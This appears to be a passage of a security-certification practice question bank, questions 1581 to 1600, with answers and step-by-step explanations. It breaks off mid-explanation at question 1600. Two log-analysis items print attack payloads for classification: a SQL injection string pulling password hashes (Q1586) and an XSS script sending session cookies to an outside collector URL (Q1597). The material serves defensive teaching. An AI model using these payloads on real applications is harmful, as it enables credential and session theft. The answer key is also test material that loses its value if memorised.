Tüm alıştırma soruları

2232 soru

Soru 1581Soru

An organization is preparing to decommission a legacy Lightweight Directory Access Protocol (LDAP) directory server following a enterprise-wide migration to a cloud identity provider. To ensure business continuity and prevent unexpected service disruptions during the shutdown, which of the following actions should the security team perform FIRST to evaluate the security impact of this change?

Cevabı ve açıklamayı göster

Cevap: Perform a dependency analysis and review directory authentication logs to identify any remaining applications or devices reliant on the legacy service.

Cevap

Perform a dependency analysis and review directory authentication logs to identify any remaining applications or devices reliant on the legacy service.
Prior to decommissioning core security or identity infrastructure, change management best practices require conducting a thorough dependency analysis and reviewing system logs. This proactive assessment identifies legacy applications, service accounts, or hardware devices still utilizing the service, allowing administrators to migrate them safely without causing unexpected outages.

Adım Adım Çözüm

1
Identify the primary operational and security risk associated with decommissioning critical identity infrastructure.
Undocumented service dependencies could cause critical application outages or fallbacks to insecure authentication methods.
Decommissioning systems requires discovering all integrated components before removing service availability.
2
Evaluate the initial step of a change management security impact assessment.
Reviewing active authentication logs and service configuration references provides empirical evidence of usage.
Empirical log analysis reveals real-time usage patterns that static documentation may omit.
3
Determine the proper sequence prior to change approval and execution.
Performing dependency mapping ensures comprehensive risk mitigation before submitting final change approval requests.
Proactive dependency discovery ensures controlled, risk-aware infrastructure modification.

Anahtar Kavram

Dependency mapping and risk analysis in change management workflows
Soru 1582Soru

A security administrator is configuring a secure transmission channel for automated database synchronization between two enterprise data centers. The organization requires a cryptographic configuration that guarantees mutual identity authentication of both endpoint servers, session confidentiality with perfect forward secrecy (PFS), and payload integrity. Which of the following cryptographic mechanisms or protocols should the administrator select? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Configure Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange during TLS session negotiation; Enforce Mutual TLS (mTLS) with dual-sided X.509 digital certificate validation

Cevap

The correct cryptographic mechanisms to implement are Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange for perfect forward secrecy and Mutual TLS (mTLS) with X.509 certificates for mutual authentication.
Implementing Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange provides dynamic, single-session keys that guarantee perfect forward secrecy. Pairing ECDHE with Mutual TLS (mTLS) ensures both database servers authenticate each other's identity using digital certificates prior to payload transmission.

Adım Adım Çözüm

1
Evaluate the requirement for session confidentiality with perfect forward secrecy (PFS).
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) generates temporary, single-session key pairs for each connection, ensuring past traffic remains secure even if long-term private keys are exposed.
Ephemeral Diffie-Hellman variants are necessary to fulfill PFS constraints.
2
Evaluate the requirement for mutual authentication between enterprise data center nodes.
Mutual TLS (mTLS) requires both the initiating server and receiving server to present X.509 certificates issued by a trusted Certificate Authority.
Standard TLS only authenticates the server to the client, whereas mTLS enforces bidirectional certificate verification.
3
Analyze and eliminate unsuitable cryptographic choices.
Static RSA key exchange lacks PFS, RSA asymmetric encryption is unsuitable for bulk data transfers due to performance overhead, and MD5 is cryptographically broken.
Cryptographic implementations must align cipher capabilities with specific operational performance and risk requirements.

Anahtar Kavram

Key Exchange Mechanisms and Authentication Protocols
Tahmini Süre:1m 30s
Soru 1583Soru

Following a high-severity alert indicating a web shell has been uploaded to a public-facing corporate web server, an incident response team is deployed to handle the breach. Place the following incident response actions in the correct sequential order from earliest to latest according to the standard NIST Incident Response Lifecycle.

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct sequence follows the standard NIST Incident Response Lifecycle: 1. Analyze web server access logs and system memory, 2. Isolate the compromised web server from the internal network, 3. Remove the web shell backdoors and patch the vulnerability, 4. Restore the web application from a clean backup image and return it to production, 5. Conduct a post-incident meeting to document findings and update WAF rules.
The standard NIST incident response methodology strictly mandates moving through Detection & Analysis, Containment, Eradication, Recovery, and Post-Incident Activity. First analyzing system memory and logs allows responders to understand the threat. Network isolation contains the incident from spreading. Eradicating the web shell and patching the vulnerability removes the threat. Restoring from a verified clean backup completes recovery. Finally, conducting a post-mortem review fulfills post-incident obligations.

Adım Adım Çözüm

1
Scope and analyze the threat (Detection & Analysis)
Identified the web shell location and scope of access.
You must first analyze and understand the extent of an active breach before taking disruptive containment steps.
2
Isolate the affected system (Containment)
Prevented lateral movement across the internal enterprise network.
Containment limits operational damage while preserving volatile data for further analysis.
3
Eliminate the threat and vulnerability (Eradication)
Removed malicious web shell files and remediated the root application flaw.
Eradication ensures the attacker cannot maintain persistence once the system is re-exposed.
4
Restore system operations (Recovery)
Web server restored from clean state and validated in production.
Recovery tests and restores operational services safely.
5
Conduct post-incident activities (Post-Incident / Lessons Learned)
Playbooks updated and Web Application Firewall rules hardened.
Lessons learned feed back into the preparation phase to prevent future occurrences.

Anahtar Kavram

NIST Incident Response Lifecycle (Detection & Analysis → Containment → Eradication → Recovery → Post-Incident Activity)
Soru 1584Soru

A customer service representative receives an incoming telephone call from an individual claiming to be an internal network administrator. The caller states that an urgent system maintenance procedure requires the representative to verbally confirm their network login credentials. Which of the following social engineering attack vectors is occurring?

Cevabı ve açıklamayı göster

Cevap: Vishing

Cevap

Vishing
Vishing (voice phishing) specifically describes social engineering attacks conducted via telephone calls or voice communications where the attacker impersonates a trusted entity to extract sensitive information.

Adım Adım Çözüm

1
Analyze the communication medium in the scenario
The attack is carried out over an incoming telephone phone call.
Identifying the medium (voice vs text vs email vs physical observation) is key to classifying the attack vector.
2
Evaluate the social engineering vector based on voice communication
Voice-based pretexting and fraud conducted over the telephone is defined as voice phishing (vishing).
The prefix 'vish' stands for voice phishing, matching phone call scenarios.

Anahtar Kavram

Vishing (Voice Phishing)
Tahmini Süre:45s
Soru 1585Soru

A financial organization is conducting a quantitative risk assessment for a mission-critical cloud payment API valued at $1,200,000\$1,200,000. Security analysts estimate that without additional controls, a major security breach would have an Exposure Factor (EFEF) of 40%40\% and an Annual Rate of Occurrence (AROARO) of 0.500.50. The organization evaluates a security safeguard with an annual operating cost of $45,000\$45,000. Implementing the safeguard is projected to reduce the EFEF to 10%10\% and the AROARO to 0.250.25. Based on this quantitative risk analysis, what is the net annual financial benefit of implementing the safeguard?

Cevabı ve açıklamayı göster

Cevap: Net annual benefit of $165,000\$165,000

Cevap

The net annual financial benefit of implementing the safeguard is $165,000\$165,000.
The correct option determines the net annual benefit by evaluating the difference between baseline annual risk and residual annual risk after control implementation, then subtracting the safeguard's annual maintenance cost. Pre-mitigation ALE is $240,000\$240,000 ($1,200,000×0.40×0.50\$1,200,000 \times 0.40 \times 0.50) and post-mitigation ALE is $30,000\$30,000 ($1,200,000×0.10×0.25\$1,200,000 \times 0.10 \times 0.25). The gross annual savings from risk reduction is $210,000\$210,000 ($240,000$30,000\$240,000 - \$30,000). Subtracting the safeguard's $45,000\$45,000 annual operational cost yields a net annual financial benefit of $165,000\$165,000.

Adım Adım Çözüm

1
Calculate the pre-initiative Single Loss Expectancy (SLE) and Annual Loss Expectancy (ALE)
SLEinitial=$1,200,000×0.40=$480,000SLE_{initial} = \$1,200,000 \times 0.40 = \$480,000; ALEinitial=$480,000×0.50=$240,000ALE_{initial} = \$480,000 \times 0.50 = \$240,000
Determines the current expected baseline annual loss prior to implementing additional controls.
2
Calculate the post-initiative SLE and ALE with the safeguard in place
SLEpost=$1,200,000×0.10=$120,000SLE_{post} = \$1,200,000 \times 0.10 = \$120,000; ALEpost=$120,000×0.25=$30,000ALE_{post} = \$120,000 \times 0.25 = \$30,000
Determines the residual annual loss expected after applying the proposed safeguard.
3
Calculate the gross ALE reduction (value of risk mitigation)
ALE Reduction=$240,000$30,000=$210,000\text{ALE Reduction} = \$240,000 - \$30,000 = \$210,000
Measures the annual loss prevented by reducing exposure and frequency of occurrence.
4
Subtract the annual cost of the safeguard to determine net benefit
Net Benefit=$210,000$45,000=$165,000\text{Net Benefit} = \$210,000 - \$45,000 = \$165,000
A safeguard is cost-effective if the net annual benefit (annual loss saved minus annual cost) is positive.

Anahtar Kavram

Quantitative Risk Analysis & Safeguard Cost-Benefit Calculation
Tahmini Süre:2m 0s
Soru 1586Soru

A security analyst monitoring enterprise SIEM alerts identifies an anomalous HTTP payload captured by an inline Network Intrusion Detection System (NIDS) sensor placed in front of an internal application gateway:

POST /api/v2/products/search HTTP/1.1
Host: portal.internal.corp
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

item_id=55+UNION+SELECT+null,username,password_hash+FROM+users--

Which of the following correctly identifies the root cause of this alert and the appropriate technical mitigation?

Cevabı ve açıklamayı göster

Cevap: The alert indicates a SQL injection attack targeting the backend database; the vulnerability should be mitigated using parameterized queries or web application firewall filtering.

Cevap

The alert indicates a SQL injection attack targeting the backend database; the vulnerability should be mitigated using parameterized queries or web application firewall filtering.
The captured NIDS payload shows an attacker passing SQL commands (`UNION SELECT null,username,password_hash FROM users--`) inside the `item_id` request parameter. This pattern explicitly targets backend database management systems via SQL Injection. Proper remediation requires enforcing parameterized queries (prepared statements) in application code and deploying Web Application Firewall (WAF) inspection rules.

Adım Adım Çözüm

1
Analyze the log payload in the NIDS alert stem.
Identified the SQL syntax `UNION SELECT null,username,password_hash FROM users--` injected into the `item_id` parameter.
Recognizing SQL statements within user input parameters isolates the attack vector to application-layer database manipulation.
2
Differentiate between web application attack types.
Confirmed the attack is SQL Injection (SQLi) rather than Cross-Site Scripting (XSS) or a network-layer memory buffer overflow.
SQLi attempts to read or modify database content, while XSS executes client-side scripts in the victim browser.
3
Determine the effective security control for mitigation.
Selected parameterized queries (prepared statements) at the application code level and Web Application Firewall (WAF) filtering at the network monitoring level.
Parameterized queries separate SQL code from user data, preventing unauthorized payload execution, while WAFs inspect layer-7 application traffic.

Anahtar Kavram

Network Intrusion Detection Log Analysis and SQL Injection Mitigation
Tahmini Süre:1m 30s
Soru 1587Soru

An organization manages a fleet of remote workstations that frequently drift from the established secure configuration baseline due to localized user modifications made while devices are offline. The security team requires a technical control that continuously audits system settings and automatically restores non-compliant configurations back to the approved baseline whenever devices re-establish network connectivity. Which of the following mechanisms best fulfills this requirement?

Cevabı ve açıklamayı göster

Cevap: Automated configuration management agents enforcing desired-state policies

Cevap

Automated configuration management agents enforcing desired-state policies
Automated configuration management software utilizing desired-state enforcement continuously monitors endpoint operating systems and applications against established secure baseline templates. When a system drifts from its designated baseline standard due to local user edits or unapproved software changes, the agent automatically reapplies the baseline settings as soon as policy synchronization occurs.

Adım Adım Çözüm

1
Analyze the operational requirements
The requirement calls for a system that actively detects configuration drift on remote endpoints and automatically reverts settings to match the baseline upon reconnecting.
Offline systems modified locally require persistent agent-driven policy enforcement that triggers remediation when connectivity allows.
2
Evaluate configuration management control capabilities
Automated configuration management frameworks (such as Desired State Configuration or policy enforcement agents) continuously verify endpoint settings against defined baseline standards and auto-apply corrective changes.
Desired-state configuration models directly address unauthorized baseline drift through automated restoration.

Anahtar Kavram

Configuration Baseline Enforcement and Drift Remediation
Tahmini Süre:1m 30s
Soru 1588Soru

An enterprise security operations team is enhancing the security posture of an automated CI/CD deployment pipeline for containerized microservices. To prevent configuration drift from the established hardening baseline and guarantee timely vulnerability remediation across deployed container hosts, which of the following operational practices should be implemented? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Rebuild and redeploy container base images whenever security patches are published for underlying OS dependencies; Integrate automated configuration baseline scanning into the build pipeline to reject non-compliant image definitions

Cevap

Rebuilding and redeploying container base images when OS patches are released, along with integrating automated baseline compliance scanning into the deployment pipeline, ensures effective patch and configuration management.
In modern containerized deployments, patch management relies on updating the underlying base image and redeploying containers (immutable infrastructure) rather than patching live instances. Simultaneously, automated baseline scanning during the pipeline execution ensures that configuration standards are verified before deployment, effectively preventing configuration drift.

Adım Adım Çözüm

1
Analyze container patch management requirements in modern CI/CD pipelines
Recognize that containerized applications utilize immutable deployment patterns, requiring base image updates rather than in-place server patching
Direct patching of running containers leads to configuration drift and inconsistent environments across microservices
2
Evaluate configuration drift prevention mechanisms
Identify automated image configuration scanning as the preventive mechanism to enforce hardening baselines prior to deployment
Automated pipeline checks prevent non-compliant or drift-susceptible container definitions from reaching production environments

Anahtar Kavram

Immutable Container Patching and Pipeline Configuration Auditing
Soru 1589Soru

An enterprise security team is upgrading its internal 802.1X EAP-TLS network authentication infrastructure. During validation testing, corporate endpoints fail to establish a TLS tunnel with the RADIUS server, returning certificate trust and capability errors. Further inspection confirms that the root and subordinate Intermediate CA certificates are properly installed in the endpoint trust stores. Which of the following certificate misconfigurations would cause endpoints to reject the RADIUS server certificate? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: The certificate lacks an Extended Key Usage (EKU) extension explicitly defining Server Authentication.; The certificate omits the Subject Alternative Name (SAN) extension, relying solely on the Subject Common Name (CN) field.

Cevap

The authentication failures are caused by omitting the Extended Key Usage (EKU) extension specifying Server Authentication and omitting the Subject Alternative Name (SAN) extension required for modern hostname and identity validation.
For an 802.1X EAP-TLS authentication server certificate to be validated successfully by endpoints, it must contain specific X.509 v3 extensions. First, the Extended Key Usage (EKU) field must explicitly specify Server Authentication so client supplicants verify the certificate's intended operational role. Second, modern clients strictly enforce RFC 6125 standards and require the Subject Alternative Name (SAN) extension to match server identity attributes. Omitting either extension leads to validation failure despite having trusted root and intermediate certificates.

Adım Adım Çözüm

1
Analyze X.509 v3 extension constraints required for 802.1X EAP-TLS server certificates.
Identified that Extended Key Usage (EKU) must explicitly state Server Authentication (OID 1.3.6.1.5.5.7.3.1) so supplicants accept the server's intended role.
Without the Server Authentication EKU attribute, supplicant validation engines treat the certificate as invalid for establishing TLS server connections.
2
Evaluate domain identity matching rules implemented in modern operating system supplicants.
Identified that modern validation enforcement requires the Subject Alternative Name (SAN) extension.
RFC 6125 deprecates using only the Subject Common Name (CN) for name validation, causing endpoints to reject server certificates that do not include the SAN extension.

Anahtar Kavram

X.509 v3 Extension Attributes and Endpoint Validation Rules
Soru 1590Soru

An enterprise security governance team is restructuring organizational documentation to ensure clear operational authority and compliance across all business units. Match each security governance document type on the left with its correct legal and operational description on the right.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Acceptable Use Policy (AUP)
Data Classification Standard
Server Security Baseline
Remote Work Security Guideline

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Acceptable Use Policy matches the high-level mandatory directive; Data Classification Standard matches the mandatory schema for categorizing assets; Server Security Baseline matches the mandatory minimum configuration threshold; Remote Work Security Guideline matches the discretionary best practices recommendations.
In security governance hierarchies, Policies (such as an Acceptable Use Policy) represent senior management's mandatory high-level directives. Standards (such as a Data Classification Standard) provide mandatory, specific rules and schemas supporting policy execution. Baselines (such as a Server Security Baseline) define the minimum required operational configurations needed to establish a consistent security floor. Guidelines (such as Remote Work Security Guidelines) offer discretionary, non-mandatory advice and best practices for operational flexibility.

Adım Adım Çözüm

1
Analyze document authority levels
Identify high-level mandatory directives vs specific mandatory technical specifications vs baseline thresholds vs discretionary advice.
Governance frameworks depend on distinguishing mandatory policy/standard/baseline elements from advisory guidance.
2
Map policies and standards to their definitions
Link the Acceptable Use Policy to overall behavioral directives and Data Classification Standard to compulsory labeling schemas.
Policies set top-level rules while standards define compulsory technical requirements.
3
Map baselines and guidelines to operational implementations
Link Server Security Baseline to minimum system configuration settings and Remote Work Security Guideline to discretionary advisory practices.
Baselines establish mandatory minimum security floors, whereas guidelines provide non-binding recommendations.

Anahtar Kavram

Information Security Policy and Governance Hierarchy Document Types
Soru 1591Soru

An organization is evaluating its risk management procedures to align with standard risk response strategies. Which of the following actions correctly represent valid risk response strategies? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Purchasing a commercial cyber insurance policy to cover financial losses resulting from data breaches.; Decommissioning a vulnerable legacy service entirely to eliminate the risk of remote exploitation.

Cevap

The actions representing valid risk response strategies are purchasing a cyber insurance policy (risk transference) and decommissioning a vulnerable legacy service (risk avoidance).
Purchasing cyber insurance shifts the financial burden of an attack to an insurance provider, which is the definition of risk transference. Decommissioning a vulnerable legacy application removes the threat vector completely, which is the definition of risk avoidance.

Adım Adım Çözüm

1
Identify the standard risk response options
The core risk response options are Risk Acceptance, Risk Avoidance, Risk Mitigation (Reduction), and Risk Transference.
Risk management frameworks categorize response activities into distinct strategies based on how the risk is handled.
2
Evaluate the statement regarding cyber insurance
Purchasing cybersecurity insurance shifts financial loss impacts to an insurer.
Shifting impact or loss liability to a third party is defined as Risk Transference.
3
Evaluate the statement regarding service decommissioning
Discontinuing a legacy service removes the risk entirely.
Altering plans or stopping activities to remove threat vectors entirely is defined as Risk Avoidance.

Anahtar Kavram

Risk Response Strategies (Avoidance, Transference, Mitigation, Acceptance)
Soru 1592Soru

An enterprise financial institution processes real-time transaction records that are committed to a primary relational database every 15 minutes. Following a catastrophic database corruption incident at 14:00, the organization restores system functionality by 17:00 using a clean backup snapshot created at 13:00. During the subsequent Business Impact Analysis (BIA) audit, the board notes that while the system was successfully restored within the acceptable 4-hour operational window before regulatory penalties apply, the financial loss from unrecoverable transactions exceeded the acceptable threshold of 30 minutes of data loss. Which parameter must the Chief Information Security Officer (CISO) modify in the Business Continuity Plan (BCP) to directly address this compliance failure?

Cevabı ve açıklamayı göster

Cevap: Decrease the Recovery Point Objective (RPO) requirement and adjust automated database snapshot schedules accordingly.

Cevap

The organization must decrease the Recovery Point Objective (RPO) requirement and adjust automated snapshot frequencies to limit transaction data loss.
The correct answer correctly identifies Recovery Point Objective (RPO) as the metric governing maximum acceptable data loss measured in time. Because 1 hour of transaction data was lost while the allowable threshold was 30 minutes, lowering the RPO requirement and increasing snapshot frequency is the required corrective action.

Adım Adım Çözüm

1
Analyze the incident metrics described in the scenario.
System downtime lasted 3 hours (14:00 to 17:00), which met the 4-hour recovery time constraint. Data loss spanned 1 hour (13:00 snapshot to 14:00 crash), exceeding the 30-minute allowable threshold.
Differentiating between time to restore operational state and maximum acceptable data loss is essential for proper metric identification.
2
Map the unmet constraint (data loss duration) to the appropriate BIA continuity metric.
The target metric measuring allowable data loss in time is Recovery Point Objective (RPO).
RPO dictates backup frequency and data replication requirements to ensure unrecoverable transactional data remains within tolerance.
3
Determine the necessary operational change.
Lowering the RPO threshold to 30 minutes or less forces snapshot schedules to run more frequently, rectifying the audit compliance finding.
Aligning technical backup windows with the revised lower RPO ensures lost data falls within acceptable financial risk boundaries.

Anahtar Kavram

Distinction between Recovery Point Objective (RPO) and Recovery Time Objective (RTO) in Business Impact Analysis
Soru 1593Soru

An enterprise risk analyst is conducting a quantitative risk assessment for a Payment Card Industry (PCI) transaction processing gateway. The asset value (AVAV) of the server cluster is $600,000\$600,000. Threat intelligence estimates an Annualized Rate of Occurrence (AROARO) of 0.400.40 for a severe security breach, with an unmitigated Exposure Factor (EFEF) of 30%30\%.

To mitigate this risk, the organization deploys a continuous security monitoring and automated data protection control costing $15,000\$15,000 annually. This control reduces the Exposure Factor (EFEF) to 5%5\% while the AROARO remains unchanged.

What is the net annual financial benefit (in USD) of implementing this security control?

Cevabı ve açıklamayı göster

Cevap: 45000

Cevap

The net annual financial benefit of implementing the security control is $45,000 USD.
The initial Annualized Loss Expectancy (ALEinitialALE_{initial}) is calculated as AV×EF×ARO=$600,000×0.30×0.40=$72,000AV \times EF \times ARO = \$600,000 \times 0.30 \times 0.40 = \$72,000. After implementing the control, the new ALEALE is $600,000×0.05×0.40=$12,000\$600,000 \times 0.05 \times 0.40 = \$12,000. The risk mitigation yields a gross annual reduction in loss of $60,000\$60,000. Subtracting the safeguard's annual cost of $15,000\$15,000 yields a net annual financial benefit of $45,000\$45,000.

Adım Adım Çözüm

1
Calculate initial Annualized Loss Expectancy (ALE)
ALEinitial=$600,000×0.30×0.40=$72,000ALE_{initial} = \$600,000 \times 0.30 \times 0.40 = \$72,000
Determines total expected financial loss per year before implementing the safeguard.
2
Calculate post-control Annualized Loss Expectancy (ALE)
ALEmitigated=$600,000×0.05×0.40=$12,000ALE_{mitigated} = \$600,000 \times 0.05 \times 0.40 = \$12,000
Determines expected financial loss per year after the safeguard reduces exposure.
3
Compute net annual financial benefit
Net Benefit=($72,000$12,000)$15,000=$45,000Net\ Benefit = (\$72,000 - \$12,000) - \$15,000 = \$45,000
Subtracts the annual cost of the safeguard from the gross annual loss reduction to find net savings.

Anahtar Kavram

Quantitative Risk Analysis & Cost-Benefit Calculation (ALE and Safeguard ROI)
Soru 1594Soru

A security analyst receives a high-priority alert indicating suspicious data transfers originating from an internal workstation. Arrange the network security monitoring and response actions in the correct sequential order from initial alert detection to detection rule optimization.

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct sequential order begins with triaging the initial NIDS alert, followed by cross-referencing NetFlow and firewall logs, performing deep packet inspection on PCAPs, applying NAC network isolation policies, and finally updating SIEM correlation rules and NIDS signatures.
Effective network security monitoring follows a structured incident response sequence. Response starts at initial alert triage, proceeds through flow correlation to verify connection validity, conducts deep packet inspection for payload analysis, executes containment via Network Access Control to halt threat propagation, and finishes by refining detection rules in the SIEM and NIDS.

Adım Adım Çözüm

1
Alert Triage
Identified suspicious alert metadata from the perimeter NIDS sensor.
The analyst must first examine the initial trigger to understand the target host and alert classification.
2
Telemetry Correlation
Confirmed active session duration and transfer volume via NetFlow and firewall log entries.
Before performing resource-intensive analysis, flow telemetry must confirm that actual traffic traversed the network.
3
Packet Payload Inspection
Extracted malicious command-and-control artifacts and payload signatures from PCAP data.
Inspecting raw frame contents provides concrete evidence of compromise needed to justify containment.
4
Host Containment
Isolated the originating workstation from the broader enterprise network using NAC.
Containing the network segment stops data exfiltration and lateral movement while preserving evidence.
5
Rule Optimization and Feedback
Tuned SIEM correlation rules and updated intrusion signatures with newly identified IoCs.
Post-incident detection rule adjustments improve future monitoring speed and reduce false positives.

Anahtar Kavram

Network Security Monitoring Incident Handling Workflow
Soru 1595Soru

Match each social engineering attack vector on the left with its corresponding operational incident scenario description on the right.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Tailgating
Watering Hole Attack
Smishing
Shoulder Surfing

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Tailgating matches unbadged physical entry by following authorized personnel; Watering Hole Attack matches compromising a trusted, frequently visited website; Smishing matches deceptive SMS text messages containing malicious links; Shoulder Surfing matches direct visual observation of screens or keyboard inputs.
Each attack vector correctly maps to its distinct channel and method of execution: tailgating exploits physical access doors, watering hole attacks compromise frequented web destinations, smishing relies on mobile SMS delivery, and shoulder surfing uses line-of-sight observation.

Adım Adım Çözüm

1
Analyze the physical access vector
Identify that gaining entry behind an authorized person without badge authorization defines Tailgating.
Tailgating relies on physical proximity and courtesy or distraction at access control points.
2
Analyze the web-based targeted vector
Identify that infecting a specific third-party portal routinely visited by personnel defines a Watering Hole Attack.
Watering hole attacks leverage the implicit trust users place in industry-specific sites.
3
Analyze the mobile cellular and visual observation vectors
Identify cellular text message phishing as Smishing, and covert visual monitoring of user screens as Shoulder Surfing.
Smishing is specific to SMS communication protocols, while shoulder surfing leverages direct line of sight in physical spaces.

Anahtar Kavram

Social Engineering Attack Vectors and Methods
Soru 1596Soru

A security administrator is setting up an automated deployment server that requires an enterprise-issued code-signing certificate from an internal Certificate Authority (CA). Which of the following procedures correctly follows Public Key Infrastructure (PKI) standards for generating and submitting a Certificate Signing Request (CSR)?

Cevabı ve açıklamayı göster

Cevap: Generate the public and private key pair locally on the deployment server, protect the private key on that server, and transmit only the CSR containing the public key to the CA for signing.

Cevap

Generate the public and private key pair locally on the deployment server, protect the private key on that server, and transmit only the CSR containing the public key to the CA for signing.
In standard PKI workflows, the applicant system generates its own public/private key pair locally. The private key is securely retained, and only the public key along with identification data is packaged into the Certificate Signing Request (CSR) sent to the Certificate Authority. This prevents private key exposure during transmission.

Adım Adım Çözüm

1
Analyze standard PKI key pair generation location
The target system (deployment server) generates the asymmetric key pair locally so the private key never leaves the boundary of the requesting system.
Preventing private key transit across network interfaces minimizes key exposure and compromise risk.
2
Evaluate the contents and submission of the Certificate Signing Request (CSR)
The CSR package includes the subject identity details and the generated public key, digitally signed by the generated private key to prove key ownership.
The CA requires only the public key and identity validation to issue a signed X.509 digital certificate.
3
Select the choice matching correct CSR generation workflow
The option specifying local key generation and transmitting only the CSR with the public key to the CA is identified as the correct procedure.
This maintains appropriate security boundaries and adheres to standard PKI lifecycle rules.

Anahtar Kavram

Public Key Infrastructure (PKI) Certificate Signing Request (CSR) Lifecycle Workflow
Soru 1597Soru

A network security analyst reviews a SIEM alert containing the following NIDS log entry captured from an internal network monitoring sensor:

[2026-07-27 11:42:19 UTC] NIDS_ALERT
Sensor: NIDS-VPC-EAST-01
Protocol: HTTP/1.1
Src_IP: 10.10.4.88:51204
Dst_IP: 172.16.50.12:80
Request: GET /portal/search.php?q=<script>document.location='http://192.168.1.50/collector.php?cookie='+document.cookie;</script> HTTP/1.1
Action: Flagged (Alert Only)

Which of the following best describes the type of attack captured in this log snippet and its intended objective?

Cevabı ve açıklamayı göster

Cevap: The alert indicates a Cross-Site Scripting (XSS) attack attempting to execute malicious script code in the victim's browser to exfiltrate session cookies.

Cevap

The alert indicates a Cross-Site Scripting (XSS) attack attempting to execute malicious script code in the victim's browser to exfiltrate session cookies.
The correct answer identifies the HTTP parameter containing `<script>` tags as a Cross-Site Scripting (XSS) attempt. The payload attempts to read the victim browser's `document.cookie` object and transmit it to an external IP address, which is a classic indicator of an XSS session hijacking attack.

Adım Adım Çözüm

1
Analyze the HTTP GET request string in the NIDS alert log snippet
Identified the payload `<script>document.location='http://192.168.1.50/collector.php?cookie='+document.cookie;</script>` passed into parameter `q`.
Determining the payload syntax reveals the vulnerability targeted by the attacker.
2
Differentiate between client-side and server-side application payload behaviors
The presence of JavaScript commands referencing browser DOM elements (`document.cookie`, `document.location`) confirms client-side execution (XSS) rather than database manipulation (SQLi).
XSS exploits trust that a user's browser has in a web application to steal sensitive tokens or session state.
3
Evaluate the analyst's interpretation against standard security monitoring principles
Confirm that the log captures an unmitigated XSS attempt flagged by a detective NIDS sensor.
Accurate alert classification allows analysts to trigger appropriate incident response playbooks, such as enforcing Web Application Firewall (WAF) rules or input sanitization.

Anahtar Kavram

Identifying Cross-Site Scripting (XSS) payloads in NIDS/SIEM log telemetry
Tahmini Süre:1m 30s
Soru 1598Soru

During an internal vulnerability assessment, an unauthenticated network scanner flags several Linux production web servers as high-risk due to an outdated Apache version disclosed in the HTTP response headers. The Linux system administrators state that security patches were backported by the distribution vendor, meaning the vulnerabilities were remediated despite the version string remaining unchanged. Which of the following actions is the most appropriate next step for the security analyst to accurately verify the true vulnerability status of these servers?

Cevabı ve açıklamayı göster

Cevap: Perform a credentialed vulnerability scan to inspect local package management metadata directly on the target hosts.

Cevap

Perform a credentialed vulnerability scan to inspect local package management metadata directly on the target hosts.
Performing a credentialed scan allows the vulnerability scanner to authenticate to the Linux host and query the local package manager (e.g., rpm or dpkg). This directly inspects the installed package patch history and confirms backported security fixes that unauthenticated network banner scans cannot detect, accurately resolving false positives.

Adım Adım Çözüm

1
Analyze the cause of the potential false positive.
Unauthenticated (non-credentialed) scans rely on network banner grabbing, which reads software version strings exposed over the network. Linux vendors frequently backport security fixes without incrementing major version numbers, causing banner grabs to report false positives.
Understanding scanner limitations prevents unnecessary emergency patching or operational disruptions.
2
Select an assessment method capable of inspecting internal host package states.
A credentialed vulnerability scan logs into the target system using provided administrative credentials to check installed software package versions via the host operating system's package manager.
Host-level inspection provides precise diagnostic data that overrides external network banner assumptions.
3
Verify the true vulnerability status.
The credentialed scan confirms that the vendor backport patch is active, validating the false positive status of the initial unauthenticated scan.
This allows the security team to document the finding correctly without applying unnecessary network blocks.

Anahtar Kavram

Credentialed vs. Non-Credentialed Vulnerability Scanning (Backported Patches)
Tahmini Süre:1m 30s
Soru 1599Soru

A healthcare organization's high-level security policy mandates that all electronic protected health information (ePHI) must be encrypted both in transit and at rest. However, a internal audit reveals that different operational teams are deploying inconsistent encryption parameters, with some using outdated ciphers. To enforce compliance, security leadership must issue a document that mandates uniform technical rules and mandatory configurations—such as requiring minimum AES-256 for storage and TLS 1.3 for transmission—across all systems, without listing step-by-step administrative workflow actions. Which of the following governance document types should be published to meet this requirement?

Cevabı ve açıklamayı göster

Cevap: Security standard

Cevap

Security standard
A security standard provides mandatory, compulsory rules and technical specifications (such as explicit algorithm requirements like AES-256 or TLS 1.3) designed to support and enforce high-level security policies across an enterprise.

Adım Adım Çözüm

1
Analyze the scenario requirement
The organization requires a mandatory document specifying technical configurations (AES-256, TLS 1.3) across all systems without step-by-step task steps.
Identifying the required level of enforceability and technical specificity points to the correct document tier.
2
Evaluate governance document definitions
Policies state high-level intent, standards define mandatory technical criteria, guidelines offer discretionary suggestions, and procedures give step-by-step instructions.
Enforcing compulsory cipher parameters enterprise-wide directly aligns with the definition of a security standard.
3
Select the governance document type
The security standard fulfills the requirement for mandatory, technology-specific compliance rules.
Standards bridge high-level policy intent with enforced baseline implementations.

Anahtar Kavram

Hierarchy of Security Governance Documents
Soru 1600Soru

A DevOps security engineer configures a CI/CD build pipeline to publish container images to a private registry. The registry uses mutual TLS (mTLS) to verify the build agent's identity and evaluates microservice access control lists (ACLs) to ensure the agent holds write permissions. However, an internal audit reveals that detailed logs of image tag modifications and timestamped service upload events are not being recorded or stored centrally. Which pillar of the AAA security framework is absent in this implementation?

Cevabı ve açıklamayı göster

Cevap: Accounting

Cevap

Accounting is the pillar of the AAA security framework missing from this deployment.
Accounting is responsible for tracking user and service activities, recording event metrics, and maintaining centralized audit trails. The failure to record image uploads and timestamped modifications directly indicates that Accounting is missing.

Adım Adım Çözüm

1
Analyze the active security components described in the scenario.
